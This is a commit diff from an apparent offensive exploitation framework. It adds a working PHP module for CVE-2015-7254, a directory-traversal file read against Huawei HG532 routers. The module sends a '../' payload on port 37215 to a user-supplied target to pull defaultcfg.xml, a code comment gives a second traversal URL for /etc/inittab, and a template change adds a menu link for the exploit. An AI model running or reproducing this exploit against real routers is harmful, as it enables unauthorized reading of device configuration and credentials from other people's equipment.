CVE-2015-7254

Added the exploit CVE-2015-7254.
alienwithin · Nov 18, 2015 · 55e0a9b · 55e0a9b
1 parent 7886984
commit 55e0a9b
Show file tree

Hide file tree

Showing 2 changed files with 20 additions and 1 deletion.
diff --git a/framework/controller/lfiplugins.php b/framework/controller/lfiplugins.php
@@ -69,6 +69,22 @@ public function zimbra_lfi(\Base $f3){
 		return $this->uri_based_lfi($blankurl,$url,$payload);
 
 	}
+    /**
+     * Huawei_lfi
+     * cve-2015-7254
+     * Directory traversal vulnerability on Huawei HG532e, HG532n, and HG532s devices allows remote attackers to read arbitrary files via a .. (dot dot) in an icon/ URI.
+     * @param \Base $f3
+     * Alternative file read: http://<target_IP>:37215/icon/../../../etc/inittab.
+     */
+    public function huawei_lfi(\Base $f3){
+        $lfi=new Larfi();
+        $f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s');
+        $this->response->data['SUBPART'] = 'lfi_page.html';
+        $url=$f3->get('POST.url');
+        $payload=":37215/icon/../../../etc/defaultcfg.xml";
+        return $this->uri_based_lfi($blankurl,$url,$payload);
+
+    }
 
 
 }
diff --git a/framework/themes/default/templates/larfi_layout.html b/framework/themes/default/templates/larfi_layout.html
@@ -6,8 +6,11 @@
         <a href="cnc/lfi/wordpress_lfi" class="list-group-item{{(@PARAMS.0=='cnc/lfi/wordpress_lfi'||@PARAMS.0=='/cnc/lfi/wordpress_lfi'?' active':'') }}">
             WP-Ebook LFI
         </a>
-        <a href="cnc/lfi/zimbra_lfi" class="list-group-item{{(@PARAMS.0=='cnc/lfi/wordpress_lfi'||@PARAMS.0=='/cnc/lfi/zimbra_lfi'?' active':'') }}">
+        <a href="cnc/lfi/zimbra_lfi" class="list-group-item{{(@PARAMS.0=='cnc/lfi/zimbra_lfi'||@PARAMS.0=='/cnc/lfi/zimbra_lfi'?' active':'') }}">
             Zimbra LFI
+        </a>
+		 <a href="cnc/lfi/huawei_lfi" class="list-group-item{{(@PARAMS.0=='cnc/lfi/huawei_lfi'||@PARAMS.0=='/cnc/lfi/huawei_lfi'?' active':'') }}">
+            Huawei LFI
         </a>
 
     </div>